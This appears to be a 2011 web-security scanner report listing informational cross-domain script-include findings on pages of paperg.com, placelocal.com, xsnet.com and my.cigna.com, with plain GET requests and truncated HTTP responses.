| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:16 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4107 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/northwoods | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4118 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/northwoods | 
| GET /flyerboard/northwoods Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4118 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/nyprig/1552 | 
| GET /flyerboard/nyprig/1552 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4071 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/nyprig/1753 | 
| GET /flyerboard/nyprig/1753 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:16 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4071 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/old-songs | 
| GET /flyerboard/old-songs Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4179 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/olsens/1552 | 
| GET /flyerboard/olsens/1552 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:12 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4074 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/pathways/1552 | 
| GET /flyerboard/pathways/1552 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4082 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/pathways/1753 | 
| GET /flyerboard/pathways/1753 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4082 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/residence-inn | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4164 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/residence-inn | 
| GET /flyerboard/residence-inn Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4164 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/seton-health | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4091 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/seton-health | 
| GET /flyerboard/seton-health Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:14 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4091 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/your-business | 
| GET /flyerboard/your-business Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 4814 Connection: close Via: 1.1 AN-0016020122637050 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /join.php | 
| GET /join.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:14:00 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 12598 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /press.php | 
| GET /press.php HTTP/1.1 Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:32 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13132 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/flyerboard | 
| GET /publishers/flyerboard Host: www.paperg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:35 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 14:45:35 GMT Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 14896 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /publishers/placelocal | 
| GET /publishers/placelocal Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=shsfh547e8 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:20:15 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 13131 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /support.php | 
| GET /support.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1305557438.1.1 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:19:13 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 Cache-Control: max-age=0 Expires: Mon, 16 May 2011 15:19:13 GMT Vary: Accept-Encoding Content-Type: text/html Connection: close Via: 1.1 AN-0016020122637050 Content-Length: 12289 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... </div> <script src="http://www.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.paperg.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:46:28 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2977 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conte ...[SNIP]... </script> <script type="text/javascript" src="https://ajax ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /forgot.php | 
| GET /forgot.php HTTP/1.1 Host: www.paperg.com Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:47 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Set-Cookie: PHPSESSID=fq6c4o1f1f Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 3158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.paperg.com | 
| Path: | /post.php | 
| GET /post.php HTTP/1.1 Host: www.paperg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27786045 | 
| HTTP/1.0 200 OK Date: Mon, 16 May 2011 16:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <title>PaperG | Post a Flyer</title> <meta http-equiv="Content-Type" co ...[SNIP]... <link id="favicon" rel="icon" type="image/gif" href="icon.gif"> <script type="text/javascript" src="https://ajax ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.placelocal.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.placelocal.com Cookie: PHPSESSID=4d3oqoeopj | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 16:15:21 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 13932 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... </script> <script src="http://www.google ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.xsnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 41050 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXANONYMOUS=aFDnl Date: Mon, 16 May 2011 17:07:35 GMT Set-Cookie: HUBSPOT32=236000428.20480 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<! ...[SNIP]... <link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787 <script src="http://cdn ...[SNIP]... <link rel="stylesheet" href="//static.hubspot <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... </script><script src="//translate.google ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="//ajax.googleapis ...[SNIP]... </script> <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | /datacenter-relocation | 
| GET /datacenter-relocation Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/it Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 50438 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Mon, 16 May 2011 17:08:24 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<! ...[SNIP]... <link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787 <script src="http://cdn ...[SNIP]... <link rel="stylesheet" href="//static.hubspot <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... </script><script src="//translate.google ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="//ajax.googleapis ...[SNIP]... </script> <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.xsnet.com | 
| Path: | /it-asset-disposition | 
| GET /it-asset-disposition Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/ Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 50347 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Date: Mon, 16 May 2011 17:08:16 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<! ...[SNIP]... <link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787 <script src="http://cdn ...[SNIP]... <link rel="stylesheet" href="//static.hubspot <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... </script><script src="//translate.google ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis ...[SNIP]... </script> <script type="text/javascript" src="//ajax.googleapis ...[SNIP]... </script> <script type="text/javascript" src="//static.hubspot.com ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min/js | 
| GET /mycignatheme/js/min/js Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:12:06 GMT last-modified: Tue, 26 Apr 2011 15:13:37 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server age: 1102 Content-Length: 516206 //alert("popup invoked..." + top.window.document var parentFlag=""; var rand_num = 'generator' + Math.random(); //generate a random window name. var click = ...[SNIP]... indicating if tablesorter should display debuging information usefull for development. * * @type jQuery * * @name tablesorter * * @cat Plugins/Tablesorter * * @author Christian Bach/christian.bach@polyester */ (function($) { $.extend({ tablesorter: new function() { var parsers = [], widgets = []; this.defaults = { cssHeader: "header", cssAsc: "headerSortUp", css ...[SNIP]... ument).ready(function(){ expandCollapseOnRead });/** * ------------------------- * jQuery-Plugin "daterangepicker.jQuery * by Scott Jehl, scott@filamentgroup.com * http://www.filamentgroup * reference article: http://www.filamentgroup * demo page: http://www.filamentgroup * ...[SNIP]... | 
